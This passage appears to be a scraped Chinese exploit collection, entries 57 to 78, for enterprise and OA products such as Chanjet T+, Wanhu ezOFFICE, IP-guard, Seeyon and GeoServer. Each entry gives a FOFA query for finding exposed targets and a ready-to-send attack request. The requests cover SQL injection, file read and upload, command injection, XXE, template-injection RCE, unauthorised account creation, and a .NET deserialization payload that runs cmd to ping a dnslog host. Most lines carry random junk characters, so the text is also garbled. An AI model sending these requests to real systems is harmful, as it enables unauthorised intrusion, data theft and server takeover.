+ K6 ~% E8 H! m1 B* ?7 t7 X2 g. t
+ H$ L4 Y4 Z5 t' [9 n: o{# g6 q3 {, Q) v
"storeID":{
# y8 J3 K# M) K7 I* G/ B% N/ p- x "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" M+ o% b1 S p# D6 j# H; L "MethodName":"Start",% t- t, a, X4 {* H7 Y' ?, ^
"ObjectInstance":{
) X; J8 Y5 Y2 @% F! L "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 a! l$ P+ ]9 m' o, V, B( ?/ G$ F
"StartInfo": {' `& i, P/ L7 t1 V' _, X Q
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"," O+ k( H+ i7 d9 F
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"! G- @5 J! S4 H2 o
}4 J) w/ d+ S% | b& C
}- `3 M/ j& z7 U, o' a/ |0 s* C
}2 G' x1 D$ q: B, E: C
}
, V) t: Q( b* p) v5 b/ S5 n
; ~2 i. P6 l# h0 G7 s+ O3 k- y2 J# Q
57. 畅捷通T+ keyEdit.aspx SQL注入6 e+ w! c7 U2 P* a
FOFA:app="畅捷通-TPlus"% Z8 @$ ~$ e& A b
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
& f$ J, c& J/ D# J4 N/ THost: host6 U; M4 s- E$ m' H7 O
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 X" U8 o5 q# D% H
Accept-Charset: utf-8
/ |' n& K/ Z2 b5 X/ p% QAccept-Encoding: gzip, deflate
0 p/ k! g/ l+ u. g+ T! r) l+ s7 G* MConnection: close
6 b3 S+ E: C3 q* W/ b8 e
% ?; ]+ h2 J! S0 o' E' r- S! p1 e/ Y9 |2 _+ ~2 S
58. 畅捷通T+ KeyInfoList.aspx sql注入7 Y4 j. k8 {& X7 @0 p
FOFA:app="畅捷通-TPlus": T9 A7 j, \3 I0 I
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
0 u# z; @) y) c8 _0 F9 q% M6 z5 a$ ?Host: your-ip/ H, d& k1 `- g9 v9 x0 r
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
: l3 z: W: V$ S6 ]Accept-Charset: utf-8( m, R$ y$ S" `9 u( n2 V# O: ~# R
Accept-Encoding: gzip, deflate* w% Z: S6 K: k5 Z
Connection: close
) n/ x4 ? r7 j! [9 C/ a- r
+ H7 u- N. M+ C. M
x2 X; v4 b; k59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行( H' I! H* B8 x. o
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
$ v' F! [$ @$ N5 O* t/ APOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.16 H0 {8 k1 _% }6 Z" z9 V
Host: 192.168.86.128:9090
0 X$ _' c) g) d, L: ?* ~5 Y* T8 CUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.369 ^; m. ~/ W# v& @
Connection: close
* w1 Z" g. E+ Q. m+ b& V7 b8 FContent-Length: 16699 v& w" z0 C8 [
Accept: */*# {$ `, r. @6 v( D* ?# r
Accept-Language: en
2 \% ~/ i1 h% u3 v5 N4 c* yContent-Type: application/x-www-form-urlencoded
6 }- [# E% ^& O3 |- Z1 t- TAccept-Encoding: gzip, M$ M. U5 k8 [( x/ a
; Z7 x3 k1 s6 f' a' Q. U
PAYLOAD! S' u3 f3 v2 B& N& C* C5 _
% y' \* M! g" ~/ K+ N1 N
/ r, G" g2 C5 U9 A# b60. 百卓Smart管理平台 importexport.php SQL注入& X G6 H$ P1 c: ~8 q; w
FOFA:title="Smart管理平台"
" T1 V6 z' R) {GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.15 V6 g3 K$ I- i8 s+ \, m
Host:
7 n* |1 X' D* o( u2 x8 [ e+ N) rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 J8 B4 f/ J. G- _( d# S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ t; w0 Z6 C( m% }4 a$ q0 I4 e
Accept-Encoding: gzip, deflate! @% ?. x; w: n/ c
Accept-Language: zh-CN,zh;q=0.9
' U* I1 G( x: d j4 K. k4 v8 ]. v; UConnection: close
2 B: p. L9 I+ c# G0 ]! g# {
% o& z0 x8 |# w4 A7 _/ {
- L, E. ^% x1 _/ K61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
. F3 H. z# L* v! k; yFOFA: title="欢迎使用浙大恩特客户资源管理系统"; F7 {* E7 V( i4 d- E, r) E! N
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.15 h" o. j3 p5 X( t& @; j' _* M
Host: x.x.x.x
8 r! _ S6 x1 T$ j* sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( R3 ?4 b/ q' N9 Z8 D6 MConnection: close& U# m/ M6 K) e5 X1 N4 B7 }
Content-Length: 27
; O( y4 [' H( H& S& JAccept: */*& C* \2 w, z/ d( H7 y) e
Accept-Encoding: gzip, deflate- {: |* H% f. q* u, G
Accept-Language: en% l1 S: w, {# C [
Content-Type: application/x-www-form-urlencoded4 i+ F2 m# |, C" g$ A
9 K6 T8 [! E" q% M; J, U+ y# x$ n
8uxssX66eqrqtKObcVa0kid98xa. Y% u/ h! j, {7 p/ I7 y! x3 s
$ O0 z3 ]) _ F2 m( }
+ P$ p6 n. M$ G) k5 @) n n
62. IP-guard WebServer 远程命令执行- ?/ d/ b7 C5 d5 k& N+ l
FOFA:"IP-guard" && icon_hash="2030860561"7 Q) Y, v3 N: T# k' p* W+ H
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.17 \5 k/ Q$ R2 ?4 L& f1 V
Host: x.x.x.x
# z2 f8 y D* z) E& C1 `& ~2 yUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
: h: k0 L1 h/ H3 O W% B, yConnection: close9 Y2 S* e) T; i+ z" h- ]: Z
Accept: */** ^% C9 S9 U. g( _5 Z, V# Q7 O3 `
Accept-Language: en. e. k/ [9 }( A' n5 H( @
Accept-Encoding: gzip0 I G' I( P5 v- }6 G
3 p s/ V3 `3 u5 }6 D2 F8 e$ I; c+ Y% v2 g$ h1 w( r8 ^ d, V* {
访问" ?* W9 S# \3 R" N
& j, q) ?. `' h# E7 |; H$ Y
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1% Y% I) \2 j! `5 ]0 k
Host: x.x.x.x
7 ?) }& k. Z, q/ E2 H5 L# D4 \' o+ E3 v N" ^
! P9 L$ j4 Z' L2 o& F4 f7 Y
63. IP-guard WebServer任意文件读取
1 h3 m& M6 w! S9 j( l* j9 ]% @( |/ R7 YIP-guard < 4.82.0609.0
5 g3 |3 w# s8 r! ~FOFA:icon_hash="2030860561"
3 v+ e9 P1 _5 D4 c3 yPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1' V0 T! f% ?7 n$ v v% f7 g& R# w
Host: your-ip
" s" Q# V2 l* lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 o0 u& N2 f$ h( _. O9 r- |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 e: t9 L" t4 E' P6 z* j
Accept-Encoding: gzip, deflate
" O( R- a( ] w) x# `: zAccept-Language: zh-CN,zh;q=0.9
; ~" I2 k ^7 P; \Connection: close$ v% \" L! M1 D/ b1 Y% m" ?
Content-Type: application/x-www-form-urlencoded, m% L1 F5 S T
, R7 i I; ]( }" L; |path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A( b; {( {6 U) Z1 A G- H# ]& L
$ B D- B, {6 ~3 @; }
64. 捷诚管理信息系统CWSFinanceCommon SQL注入$ d- G) ]" m! U8 o# K
FOFA:body="/Scripts/EnjoyMsg.js" M5 K8 W( p( k. y
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.16 r/ ]/ C" z% `9 V+ U* J/ K9 X
Host: 192.168.86.128:90010 f" `/ ?4 n( S8 F+ G6 T
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
; Z. t9 D% I6 a# [: U7 A9 y7 _Connection: close
- c, z; C- Q4 y; @+ yContent-Length: 369
6 [$ U1 e$ S* E. ]# xAccept: */*$ G! r/ n: T1 d5 r& R' |& q% [
Accept-Language: en
( v0 U/ L4 k2 a& ~- \- ~8 y) YContent-Type: text/xml; charset=utf-8' _* k9 @. E( Y: K1 _5 y
Accept-Encoding: gzip
% y+ a8 y0 f6 B( `
% ?' J, `+ s' e9 a! o& _3 m<?xml version="1.0" encoding="utf-8"?>
8 v0 u: G2 T- R5 C* b* B<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) v+ `7 j* L. Y/ `5 n<soap:Body>
9 h0 l6 S' j3 n( e. R: s <GetOSpById xmlns="http://tempuri.org/">8 ], I; G6 A* p$ x
<sId>1';waitfor delay '0:0:5'--+</sId>
. c1 \: {- o6 ~4 A; U8 {/ _ </GetOSpById>
0 }( S, B7 a2 c; V </soap:Body>1 m7 V: _5 U; ^' O4 x# M
</soap:Envelope>, w5 e; z/ {* D
/ k- K. o0 E' s+ d+ o: Z' Y
( @# K/ v1 k3 S2 H! T! d65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过 u0 R0 [% v: X. R
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"# O( c' t/ I& h. l/ o# t, k! a
响应200即成功创建账号test123456/123456$ D& E2 T. ]5 ?8 r, W# K
POST /SystemMng.ashx HTTP/1.14 v5 ^6 y8 O4 Q' U" L
Host:
y+ _9 f; x0 W1 ~% qUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
* ~% v, d7 Y( B- ^Accept-Encoding: gzip, deflate4 @2 S! W( k. B
Accept: */*
8 n: z3 u) ?6 |Connection: close/ z8 I$ ]4 Y8 k3 X1 v: @ Z
Accept-Language: en
: ?( {4 S9 C( s# D! O& C+ MContent-Length: 174/ @. Y" F% G" i4 k# G# G
0 o/ q/ ? d' O/ }4 T5 `
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators; h2 c8 K" {1 A' U
- B% i" l, Q# s2 Y+ B, {9 ^: Y% |
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入. u% R6 w! x' J9 g" |) O- g3 q
FOFA:app="万户ezOFFICE协同管理平台"( W: s& C5 y) H3 `& N; X$ u% Z
3 j# A, Z* e: |' ^- dGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
3 f. J+ C- R# y# `2 ~' N( PHost: x.x.x.x: D, w& E1 q$ ]5 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, }3 m* a( V6 N/ V: @- m
Connection: close
% D3 z- R; g, D `/ p) ^8 `Accept: */** y; h$ l) _' ^1 y. Z# C
Accept-Language: en- h7 M5 A Q! C
Accept-Encoding: gzip
- f0 U4 g1 u* M% d$ ?0 v1 P M1 L' T" i/ b7 H* V! X
) `, }& S2 X/ {7 l
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在& z: u$ _5 } N" d" O/ Y
) X% t6 K. L/ p# _5 P8 S3 i" G8 r; Z
67. 万户ezOFFICE wpsservlet任意文件上传
' o v( N6 C0 m& lFOFA:app="万户网络-ezOFFICE"
+ ]" H# g ?5 D/ N: InewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型; M' ^' v4 J6 L/ w( @: J
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
$ z/ u" A0 N( z- X0 HHost: x.x.x.x
% V: B; `# t# j; ], ]% h: EUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, p- [; {+ y& X, Y+ q
Content-Length: 1738 @% H& ]4 @3 y9 @- l+ q6 w+ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
4 {/ o0 G' [" A. @2 T* C4 R+ eAccept-Encoding: gzip, deflate' I" P) S4 \! w* P, e: w" t ?) T' L) t
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
2 x5 [) U# g3 p0 m& M7 ]; L" a$ y& z AConnection: close2 D; o) H7 t9 b6 S7 O0 y) ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
8 u: l9 r1 C) o$ f6 y6 |9 c" SDNT: 1
! B( R/ C0 s: I) C9 t& EUpgrade-Insecure-Requests: 1
- I' S3 y) b- F$ d. h3 b' r: k5 ~! k3 R/ N0 }* ^
--ufuadpxathqvxfqnuyuqaozvseiueerp
: g2 E: m0 H5 ]+ E6 X- w y7 WContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
# X1 J8 N- ]9 M3 X( S( [
; M9 ^) H- A/ b5 y% B" R' L! K<% out.print("sasdfghjkj");%>3 i! s$ p1 d" k2 f, K4 K
--ufuadpxathqvxfqnuyuqaozvseiueerp--) |: H0 a# {" v3 F/ w3 g2 n
1 n# ~6 i$ z: P) p0 O9 m4 B: s9 i6 F' r. u
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
; r6 ?4 U0 j4 B& ]6 y; v
/ K( S" A8 E+ { _68. 万户ezOFFICE wf_printnum.jsp SQL注入 b5 E% o% \; {+ |2 P! B
FOFA:app="万户ezOFFICE协同管理平台"
( y6 j8 |$ L- w0 j( X( m3 eGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1# B) s+ Y5 W* O8 g) ~" }% ^
Host: {{host}}
/ P: }/ h4 s# t* W( iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
x% i1 d% C8 `0 dAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.82 ]) @2 q8 Q& M: {( E
Accept-Encoding: gzip, deflate4 U% Q; B0 j9 j: M; W/ x& Q2 E! ?
Accept-Language: zh-CN,zh;q=0.9" R$ }+ E, K6 A# \( o
Connection: close! b- K7 ?2 d4 G n
6 h4 `& `" j( Q3 L$ W+ l1 @
6 ~, k% ~- W! g) X69. 万户 ezOFFICE contract_gd.jsp SQL注入1 r4 C7 n7 L# m+ H: q V; \
FOFA:app="万户ezOFFICE协同管理平台"
9 w. l/ A+ \ L% h4 {+ Y! {4 DGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
m4 n; j( Z: a" c P5 SHost: your-ip. g( ~* ^# Q( D3 }6 V1 {
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; D$ g& H, X" {1 u O2 A u/ J0 y
Accept-Encoding: gzip, deflate1 s! W3 m) X6 M8 O" Z5 ]) Y
Accept: */*3 m0 B" ^4 z# l5 a8 g
Connection: keep-alive/ S) W/ r* `: O4 k& g
9 s6 V7 o( G2 e3 L5 {/ z# u4 _
W* P! ?. r) \8 Q _$ d70. 万户ezEIP success 命令执行
, E& R- m" U# G5 aFOFA:app="万户网络-ezEIP"
: r9 u, d+ J9 @; i A, y' HPOST /member/success.aspx HTTP/1.1
* Z$ z" J/ T5 L$ `) H: SHost: {{Hostname}}4 [& u: O |0 n, [; m4 `0 ], [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# |: I1 c& Y N7 L# b- ySID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
, x. o! J! x6 D& kContent-Type: application/x-www-form-urlencoded
4 M+ @% N8 K; ~5 z+ G5 F" pTYPE: C
& j- J5 b; i, ~2 A5 B$ EContent-Length: 167029 v, Y W3 S! R7 A
& r6 q/ E7 z9 j! v; J__VIEWSTATE=PAYLOAD; u* E V& v, {
9 d# w; \/ }8 C. P* }+ W
. D; Q3 ^ S& q, E
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入7 ~. y5 w. Q2 ^3 R% H4 R; D+ U6 y: O
FOFA:body="PM2项目管理系统BS版增强工具.zip"- |) y6 b4 o% T! _# B
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
& K3 w- l3 L2 ]$ v$ {8 t+ eHost: x.x.x.xx.x.x.x% a4 f' `5 I" a1 _7 [# K# r# A# c
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
6 {4 h# y7 O$ G/ l, [Connection: close. q* a* c t% G! e3 m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* m7 ~: v0 u: x/ z. o
Accept-Encoding: gzip, deflate
: P% N0 g% r4 R* K/ t. G& y( DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& t( K' I/ M! B% v+ AUpgrade-Insecure-Requests: 16 [+ o% \+ z7 c; C. h
' L+ X5 t* y$ n3 A% _
* @, ^# E( p/ Z" }4 \3 b72. 致远OA getAjaxDataServlet XXE
; P' h) i) N4 s. x; d0 A% VFOFA:app="致远互联-OA"
; i5 ?/ d; k f/ z( |POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
0 V/ K2 y0 _3 X/ R' t& n6 MHost: 192.168.40.131:8099
! b! U! h7 B6 g% Q, c! n" ~User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
3 E8 b* R8 e( T8 CConnection: close
# y" y+ q5 ^- \0 V' x1 i+ Q: GContent-Length: 583
0 p, P A; |: P0 o4 w2 uContent-Type: application/x-www-form-urlencoded) V, Q) Z8 G0 V& J
Accept-Encoding: gzip
, s5 i9 {6 W' U& K; ]% }
0 i# x. g% r& A/ Z" w5 H3 q6 fS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
& E9 m! @6 L2 e5 Q7 R7 P) v1 x
3 G) p0 G3 d4 l4 L+ P- Z6 |/ K( ^/ t$ S/ Q6 ^
73. GeoServer wms远程代码执行, P9 m/ Z+ L; v8 P) x' h
FOFA:icon_hash=”97540678”% t2 m% l$ N' q) s
POST /geoserver/wms HTTP/1.11 Z% z7 S6 J v% v5 ]( N
Host:
0 I0 J. p5 \6 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 N- I+ |" N: F! U, h: a! `+ `2 YContent-Length: 1981& x; ]. y% `7 p) L
Accept-Encoding: gzip, deflate1 ~: ~; G9 H. d' \4 C+ ~8 H
Connection: close1 N$ L3 j# [2 I5 ^) z1 a$ ^! H
Content-Type: application/xml" [9 X' O- ^" W! ?
SL-CE-SUID: 3
& _+ x2 V1 Z, v; X# S5 {' _) ?4 ?3 ?% }0 R& d6 Z
PAYLOAD+ }7 H, o% T/ ?4 Z
8 R' a; K) k7 q
@* X3 @/ z: u5 Q7 H5 @
74. 致远M3-server 6_1sp1 反序列化RCE
& V- Y4 Z" M; I8 pFOFA:title="M3-Server"* q) T, P9 ?5 g- D) W
PAYLOAD
/ G6 M6 A; D% F" ^; ^8 f
8 U3 z) a) p/ }9 U3 w75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
2 c# S1 Z; }/ _$ X8 h) HFOFA:app="TELESQUARE-TLR-2005KSH"
4 y9 \" v& G" i( K4 mGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
3 X. ]2 V4 |2 @8 X. vHost: x.x.x.x+ E7 l+ k! B: e2 D2 a$ H+ H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 ~' v7 K8 M8 N2 a- w
Connection: close3 c3 Y( D+ e; b* A9 }
Accept: */*
0 F6 C- |) E; o& } [8 FAccept-Language: en
I- E! D' @8 |) `: [Accept-Encoding: gzip
: B t: b. @, B* C, [4 X* H8 w( u, S( B( U9 P
x0 F& \, E/ p4 H [
GET /cgi-bin/test28256.txt HTTP/1.1( B7 V2 C" e3 E8 r; l! K
Host: x.x.x.x
) K- y7 n2 ?/ X+ a8 k1 m3 F0 L- g% D6 }+ S- b) f
5 ` B1 d6 \" f( ~7 D* E. c1 F76. 新开普掌上校园服务管理平台service.action远程命令执行2 Q' W, `' r' v
FOFA:title="掌上校园服务管理平台"
' {3 x$ d" I$ x( e# WPOST /service_transport/service.action HTTP/1.1
$ y. B, B* T3 ]1 l3 wHost: x.x.x.x7 O. P3 Q' M' m. g! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' O6 e0 R, t1 z. kConnection: close
% j/ G$ W- j2 ]; a' z' C# H mContent-Length: 211
9 W. r# S c6 T/ K% Q4 _: `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, ~/ ^: U$ _ F" J# T/ LAccept-Encoding: gzip, deflate
+ c( x) v' L( { S$ b r5 V# VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 e: ^# q5 p6 B- l2 fCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
: G# c3 c% `" L4 z nUpgrade-Insecure-Requests: 15 p: V4 ^# z$ T, C' ^
5 I2 w& w* g* B( c: b/ ~
{
9 [( p6 E' l2 J9 f, R"command": "GetFZinfo",+ |3 Z3 b+ A( A9 b+ I, ~
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"9 ?- E0 }) S+ X8 Q% _% V
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
0 P$ {5 n h6 R. v* T}
. C& Y' y' g- k
" e2 A- y# v }6 J0 g
5 J+ H. ^# T8 h) ]GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
* B8 U2 `( A Y2 H2 ^6 xHost: x.x.x.x6 l; X, { N8 }# p8 r
, M+ ]8 @/ D' U1 U& D& J$ x
, N* v' L; g" s6 a" ^; ^# o
- D( ?# W2 _1 c" H8 q) w77. F22服装管理软件系统UploadHandler.ashx任意文件上传
( q: r" ^) n" O# VFOFA:body="F22WEB登陆"
! `5 @3 x) P4 N6 YPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1) ^7 H9 I8 g* w h1 P
Host: x.x.x.x
/ f- y1 f8 S J5 K& e mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 Q( u! U$ n8 v1 r
Connection: close3 \& X1 ]/ c, \
Content-Length: 433- b1 C7 G3 ]; D/ G6 V& \8 x' i
Accept: */*$ b0 L. L5 O' O* T9 s) L ~6 |- P
Accept-Encoding: gzip, deflate! H) K2 Y* E: o; `' @4 v
Accept-Language: zh-CN,zh;q=0.9- c7 z a! S/ a. A
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
" P9 {# C6 z' ]' F7 N# d/ i: U: T5 R, x4 g
------------398jnjVTTlDVXHlE7yYnfwBoix
6 \; |: K; t% tContent-Disposition: form-data; name="folder"9 J) t2 `. V% F6 B8 H" N5 i5 h! h
7 K: J+ t0 `7 A' m/upload/udplog
6 d- y* L0 P2 R1 D- r------------398jnjVTTlDVXHlE7yYnfwBoix
1 `3 J. Y0 w4 LContent-Disposition: form-data; name="Filedata"; filename="1.aspx"9 I1 W, ~/ N- J6 S* U: }8 r
Content-Type: application/octet-stream/ Q/ k0 R [- {& f$ m( @
6 B" Q7 J+ c7 ]0 `4 shello1234567
5 U0 q: e& [" r0 l4 P' j9 n! ^9 d! [------------398jnjVTTlDVXHlE7yYnfwBoix7 o* I0 K: S* |
Content-Disposition: form-data; name="Upload"
4 m& E, n0 { ~5 p7 n2 c3 b1 |
+ f- w0 S- ~5 ~" {; W1 dSubmit Query
$ `7 t8 x0 g' @. A, S. i, }0 Q6 d" ?- k5 L------------398jnjVTTlDVXHlE7yYnfwBoix--
# n( ~2 \ J* g' J
/ F0 o+ V$ D: O2 m3 j
9 x/ [% J3 e6 r9 |5 N7 f5 D& o78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& B2 W6 u6 _2 g; [9 VFOFA:icon_hash="2001627082"
0 k9 e2 e n6 u' z `5 yPOST /Platform/System/FileUpload.ashx HTTP/1.11 H8 w9 n: f! i. I- L9 `3 g. A
Host: x.x.x.x. w$ A! N% h+ ]. n' G# {! {& s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ y" q F% [) a4 M# ^* L$ r
Connection: close5 s( e. J% S: o9 q
Content-Length: 336
, R5 _- \8 c/ Y. a! H8 A% ?6 [- p" u* {Accept-Encoding: gzip
% ]" s8 Z2 C) a+ c2 K- |# h9 }+ _7 NContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
, C4 O% w% n* p7 S% I# e/ Q5 w& e
5 j1 _, k1 U5 q5 n/ E; ^) |------YsOxWxSvj1KyZow1PTsh98fdu6l5 i2 Z5 P) ^- w4 a4 A2 Q
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"! c1 c% V1 e0 d: O
Content-Type: image/png/ v, @6 v6 C* C K0 _; a5 p
8 e+ X# `, R; L8 Z+ V- y- ~* fYsOxWxSvj1KyZow1PTsh98fdu6l' R, d" l$ s( m9 n; i' ?
------YsOxWxSvj1KyZow1PTsh98fdu6l
& ] A C$ N& N6 D6 b! uContent-Disposition: form-data; name="target"
1 v0 d( |* ~; }8 k2 x0 W* C- F* g# E/ ?, K/ p6 S R* D$ T3 u( Y
